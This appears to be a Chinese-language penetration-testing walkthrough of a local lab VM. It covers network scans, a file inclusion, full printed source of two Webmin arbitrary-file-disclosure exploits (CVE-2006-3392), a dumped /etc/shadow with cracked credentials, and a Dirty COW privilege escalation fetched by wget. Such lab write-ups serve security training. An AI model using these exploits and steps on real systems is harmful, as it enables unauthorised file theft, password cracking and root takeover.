信息收集
1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.16.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.16.1 00:50:56:c0:00:08 VMware, Inc.
192.168.16.2 00:50:56:e6:0b:60 VMware, Inc.
192.168.16.140 00:0c:29:5e:18:c9 VMware, Inc.
192.168.16.254 00:50:56:e5:ee:15 VMware, Inc.
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.387 seconds (107.25 hosts/sec). 4 responded
2、netdiscover
netdiscover -r 192.168.16.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.16.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.16.2 00:50:56:e6:0b:60 1 60 VMware, Inc.
192.168.16.140 00:0c:29:5e:18:c9 1 60 VMware, Inc.
192.168.16.254 00:50:56:e5:ee:15 1 60 VMware, Inc.
3、nmap
主机发现
┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.16.0/24 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-10 21:04 CST
Nmap scan report for 192.168.16.1
Host is up (0.00011s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.16.2
Host is up (0.00019s latency).
MAC Address: 00:50:56:E6:0B:60 (VMware)
Nmap scan report for 192.168.16.140
Host is up (0.00021s latency).
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Nmap scan report for 192.168.16.254
Host is up (0.0012s latency).
MAC Address: 00:50:56:E5:EE:15 (VMware)
Nmap scan report for 192.168.16.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.34 seconds
端口探测
┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.16.140 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-10 21:04 CST
Nmap scan report for 192.168.16.140
Host is up (0.0021s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.47 seconds
、
┌──(root㉿ru)-[~/kali]
└─# cat ports.nmap | awk '{print $1}' | head -n 10 | tail -n 5 | awk -F "/" '{print $1}' | xargs -n 5 | sed 's/ /,/g'
22,80,139,445,10000
信息探测
┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -O -p 22,80,139,445,10000 192.168.16.140 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-10 21:13 CST
Nmap scan report for 192.168.16.140
Host is up (0.00025s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
| 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_ 2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp open Eetbios-p Samba smbd 3.0.26a (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-server-header: MiniServ/0.01
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM), Linux 2.6.22 - 2.6.23
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: ubuntuvm
| NetBIOS computer name:
| Domain name: nsdlab
| FQDN: ubuntuvm.NSDLAB
|_ System time: 2023-12-07T10:52:07-06:00
|_clock-skew: mean: -2d17h21m17s, deviation: 4h14m34s, median: -2d20h21m18s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.27 seconds
漏洞探测
┌──(root㉿ru)-[~/kali]
└─# nmap --script=vuln -p 22,80,139,445,10000 192.168.16.140 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-10 21:15 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.16.140
Host is up (0.00019s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
| /index/: Potentially interesting folder
|_ /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10000/tcp open snet-sensor-mgmt
| http-vuln-cve2006-3392:
| VULNERABLE:
| Webmin File Disclosure
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2006-3392
| Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
| This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
| to bypass the removal of "../" directory traversal sequences.
|
| Disclosure date: 2006-06-29
| References:
| http://www.exploit-db.com/exploits/1997/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
|_ http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
Nmap done: 1 IP address (1 host up) scanned in 345.26 seconds
4、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.16.140
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.16.140
+ Target Hostname: 192.168.16.140
+ Target Port: 80
+ Start Time: 2023-12-10 21:13:56 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
+ /: Retrieved x-powered-by header: PHP/5.2.3-1ubuntu6.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ PHP/5.2.3-1ubuntu6 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ Apache/2.2.4 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ PHP/5.2 - PHP 3/4/5 and 7.0 are End of Life products without support.
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /php/: Directory indexing found.
+ /php/: This might be interesting.
+ /icons/: Directory indexing found.
+ /icons/README: Server may leak inodes via ETags, header found with file /icons/README, inode: 294754, size: 4872, mtime: Fri Jun 25 03:46:08 2010. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /index1.php: PHP include error may indicate local or remote file inclusion is possible.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 0 error(s) and 22 item(s) reported on remote host
+ End Time: 2023-12-10 21:14:12 (GMT8) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
目录探测
1、gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.16.140 -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.16.140
[+] Method: GET
[+] Threads: 10
[+] Wordlist: directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index (Status: 200) [Size: 295]
/index2 (Status: 200) [Size: 156]
/php (Status: 301) [Size: 332] [--> http://192.168.16.140/php/]
/index1 (Status: 200) [Size: 1104]
/server-status (Status: 403) [Size: 313]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================
2、dirsearch
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# dirsearch -u http://192.168.16.140 -e*
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak
HTTP method: GET | Threads: 30 | Wordlist size: 15490
Output File: /root/.dirsearch/reports/192.168.16.140/_23-12-10_21-27-19.txt
Error Log: /root/.dirsearch/logs/errors-23-12-10_21-27-19.log
Target: http://192.168.16.140/
[21:27:19] Starting:
[21:27:19] 301 - 332B - /php -> http://192.168.16.140/php/
[21:27:40] 200 - 295B - /index
[21:27:40] 200 - 295B - /index.php
[21:27:40] 200 - 295B - /index.php/login/
[21:27:40] 200 - 156B - /index2
[21:27:40] 200 - 156B - /index2.php
[21:27:46] 200 - 896B - /php/
Task Completed
WEB
1、80端口
点击后跳转到这里来!
需要密码,没有密码就会报错!我们还可以看到他的版本!
2、10000端口
不知道账号密码!
文件包含
经过测试,主页存在文件包含漏洞。我们可以读到passwd文件。我们可以收集一下信息!
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
除了这些就没有多余的信息了!
searchsploit
1、webmin漏洞
┌──(root㉿ru)-[~/kali]
└─# searchsploit Webmin
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' D | cgi/webapps/23535.txt
phpMyWebmin 1.0 - 'target' Remote File Inclus | php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File In | php/webapps/2451.txt
Webmin - Brute Force / Command Execution | multiple/remote/705.pl
webmin 0.91 - Directory Traversal | cgi/remote/21183.txt
Webmin 0.9x / Usermin 0.9x/1.0 - Access Sessi | linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation | linux/remote/21765.pl
Webmin 0.x - Code Input Validation | linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution | multiple/remote/746.pl
Webmin 1.5 - Web Brute Force (CGI) | multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Comman | unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities | cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Meta | cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Comma | linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution | linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Ex | linux/remote/47230.rb
Webmin 1.962 - 'Package Updates' Escape Bypas | linux/webapps/49318.rb
Webmin 1.973 - 'run.cgi' Cross-Site Request F | linux/webapps/50144.py
Webmin 1.973 - 'save_user.cgi' Cross-Site Req | linux/webapps/50126.py
Webmin 1.984 - Remote Code Execution (Authent | linux/webapps/50809.py
Webmin 1.996 - Remote Code Execution (RCE) (A | linux/webapps/50998.py
Webmin 1.x - HTML Email Command Execution | cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary | multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary | multiple/remote/2017.pl
Webmin < 1.920 - 'rpc.cgi' Remote Code Execut | linux/webapps/47330.rb
---------------------------------------------- ---------------------------------
Shellcodes: No Results
搜出了很多,首先我们要选择的是webmin的漏洞,然后需要认证Authenticated的漏洞我们不选,因为我们根本不知道webmin的帐号以及密码!CSRF的漏洞先不考虑。
结合之前nmap漏洞脚本扫描的结果,我们应该侧重选择文件泄露相关的漏洞Arbitary File Disclosure,1997和2017其实可以,我这里选择使用perl语言!
┌──(root㉿ru)-[~/kali]
└─# searchsploit -m 2017.pl
Exploit: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
URL: https://www.exploit-db.com/exploits/2017
Path: /usr/share/exploitdb/exploits/multiple/remote/2017.pl
Codes: CVE-2006-3392
Verified: True
File Type: Perl script text executable
Copied to: /root/kali/2017.pl
┌──(root㉿ru)-[~/kali]
└─# searchsploit -m 1997.php
Exploit: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
URL: https://www.exploit-db.com/exploits/1997
Path: /usr/share/exploitdb/exploits/multiple/remote/1997.php
Codes: OSVDB-26772, CVE-2006-3392
Verified: True
File Type: PHP script, ASCII text
Copied to: /root/kali/1997.php
2、payload
2017.pl
┌──(root㉿ru)-[~/kali]
└─# cat 2017.pl
#!/usr/bin/perl
# Exploit for WEBMIN and USERMIN less than 1.29x
# ARBITARY REMOTE FILE DISCLOSURE
# WORKS FOR HTTP AND HTTPS (NOW)
# Thrusday 13th July 2006
# Vulnerability Disclosure at securitydot.net
# Coded by UmZ! umz32.dll _at_ gmail.com
#
#
#
# Make sure you have LWP before using this exploit.
# USE IT AT YOUR OWN RISK
#
# GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................
# for other.. like AHMED n FAIZ ... (GET A LIFE MAN).
# Revised on Friday 14th July 2006
use LWP::Simple;
use LWP::UserAgent;
my $userag = LWP::UserAgent->new;
if (@ARGV < 4) {
print("Usage: $0 <url> <port> <filename> <target> \n");
print("TARGETS are\n ");
print("0 - > HTTP \n");
print(" 1 - > HTTPS\n");
print("Define full path with file name \n");
print("Example: ./webmin.pl blah.com 10000 /etc/passwd\n");
exit(1);
}
($target, $port,$filename, $tar) = @ARGV;
print("WEBMIN EXPLOIT !!!!! coded by UmZ!\n");
print("Comments and Suggestions are welcome at umz32.dll [at] gmail.com\n");
print("Vulnerability disclose at securitydot.net\nI am just coding it in perl 'cuz I hate PHP!\n");
print("Attacking $target on port $port!\n");
print("FILENAME: $filename\n");
$temp="/..%01" x 40;
if ($tar == '0')
{ my $url= "http://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
$content=get $url;
print("\n FILE CONTENT STARTED");
print("\n -----------------------------------\n");
print("$content");
print("\n -------------------------------------\n");
}
elsif ($tar == '1')
{
my $url= "https://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
my $req = HTTP::Request->new(GET => $url);
my $res = $userag->request($req);
if ($res->is_success) {
print("FILE CONTENT STARTED\n");
print("-------------------------------------------\n");
print $res->as_string;
print("-------------------------------------------\n");
}
else {
print "Failed: ", $res->status_line, "\n";
}
}
# milw0rm.com [2006-07-15]
1997.php
┌──(root㉿ru)-[~/kali]
└─# cat 1997.php
<?php
/*
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability
Date : 2006-06-30
Patch : update to version 1.290
Advisory : http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html
Coded by joffer , http://securitydot.net
*/
$host = $argv[1];
$port = $argv[2];
$http = $argv[3];
$file = $argv[4];
// CHECKING THE INPUT
if($host != "" && $port != "" && $http != "" && $file != "") {
$z = "/..%01";
for ($i=0;$i<60;$i++) {
$z.="/..%01";
}
$target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file."";
echo "Attacking ".$host."\n";
echo "---------------------------------\n";
// INITIALIZING CURL SESSION TO THE TARGET
$ch = curl_init();
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
$content = curl_exec($ch);
curl_close ($ch);
// CLOSING CURL
// ECHOING THE CONTENT OF THE $FILE
echo $content;
echo "---------------------------------\n";
echo "Coded by joffer , http://securitydot.net\n";
} else {
// IF INPUT IS NOT CORRECT DISPLAY THE README
echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILE\n";
echo "Example : php webmin.php localhost 10000 http /etc/shadow\n";
echo "Coded by joffer , http://securitydot.net\n";
}
?>
# milw0rm.com [2006-07-09]
这两个的利用方式都差不多。可以利用这两个exp进行文件读取!
┌──(root㉿ru)-[~/kali]
└─# perl 2017.pl 192.168.16.140 /etc/shadow
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
┌──(root㉿ru)-[~/kali]
└─# perl 2017.pl 192.168.16.140 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.16.140 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
-------------------------------------
果然存在文件泄露漏洞!一共有四个哈希散列!我们进行下一步!
john
┌──(root㉿ru)-[~/kali]
└─# john username --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:02:28 32.88% (ETA: 23:17:59) 0g/s 32401p/s 162011c/s 162011C/s ovnirosy..ovidmesh
0g 0:00:03:24 45.57% (ETA: 23:17:56) 0g/s 32024p/s 160124c/s 160124C/s kendyl91..kendri30
h4ckm3 (vmware)
1g 0:00:06:11 89.04% (ETA: 23:17:25) 0.002695g/s 34015p/s 156538c/s 156538C/s 2324567..2324126
1g 0:00:06:49 DONE (2023-12-10 23:17) 0.002442g/s 34443p/s 156332c/s 156332C/s enter09..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
ok啊,破解到了一个账户名以及密码!
vmware:h4ckm3
SSH登录
┌──(root㉿ru)-[~/kali]
└─# ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss vmware@192.168.16.140
vmware@192.168.16.140's password:
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Fri Jun 20 14:35:37 2008
vmware@ubuntuvm:~$ id
uid=1000(vmware) gid=1000(vmware) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),111(lpadmin),112(admin),1000(vmware)
vmware@ubuntuvm:~$
拿到了初始shell,权限太低了!
提权1
vmware@ubuntuvm:~$ sudo -l
[sudo] password for vmware:
Sorry, user vmware may not run sudo on ubuntuvm.
vmware@ubuntuvm:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
vmware@ubuntuvm:~$ pwd
/home/vmware
vmware@ubuntuvm:~$ ls
vmware@ubuntuvm:~$ ls -al
total 28
drwxr-xr-x 3 vmware vmware 4096 2008-06-19 10:11 .
drwxr-xr-x 6 root root 4096 2008-06-11 09:26 ..
-rw------- 1 vmware vmware 65 2008-06-20 14:39 .bash_history
-rw-r--r-- 1 vmware vmware 220 2008-06-10 07:10 .bash_logout
-rw-r--r-- 1 vmware vmware 2298 2008-06-10 07:10 .bashrc
-rw-r--r-- 1 vmware vmware 566 2008-06-10 07:10 .profile
drwx------ 2 vmware vmware 4096 2008-06-12 11:19 .ssh
-rw-r--r-- 1 vmware vmware 0 2008-06-10 12:43 .sudo_as_admin_successful
vmware@ubuntuvm:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/smbumount
/usr/bin/chfn
/usr/bin/sudoedit
/usr/bin/newgrp
/usr/bin/arping
/usr/bin/gpasswd
/usr/bin/smbmnt
/usr/bin/at
/usr/bin/chsh
/usr/sbin/pppd
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/apache2/suexec
/bin/su
/bin/umount
/bin/ping
/bin/ping6
/bin/check-foreground-console
/bin/fusermount
/bin/mount
/sbin/mount.cifs
/sbin/umount.cifs
/lib/dhcp3-client/call-dhclient-script
vmware@ubuntuvm:~$
脏牛提权
vmware@ubuntuvm:/tmp$ wget http://192.168.16.128/dirty.c
--13:11:07-- http://192.168.16.128/dirty.c
=> `dirty.c'
Connecting to 192.168.16.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,815 (4.7K) [text/x-c]
100%[====================================>] 4,815 --.--K/s
13:11:07 (673.80 MB/s) - `dirty.c' saved [4815/4815]
vmware@ubuntuvm:/tmp$ ls
dirty.c sqllS3Hev
vmware@ubuntuvm:/tmp$ chmod +x dirty.c
vmware@ubuntuvm:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
vmware@ubuntuvm:/tmp$ ls
dirty dirty.c sqllS3Hev
vmware@ubuntuvm:/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fionu3giiS71.:0:0:pwned:/root:/bin/bash
mmap: b7f6b000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1234'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
vmware@ubuntuvm:/tmp$ madvise 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1234'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
vmware@ubuntuvm:/tmp$ ls
dirty dirty.c passwd.bak sqllS3Hev
vmware@ubuntuvm:/tmp$ cat /etc/passwd
firefart:fionu3giiS71.:0:0:pwned:/root:/bin/bash
/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
vmware@ubuntuvm:/tmp$ su firefart
Password:
firefart@ubuntuvm:/tmp# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@ubuntuvm:/tmp# cd /root
firefart@ubuntuvm:~# ls
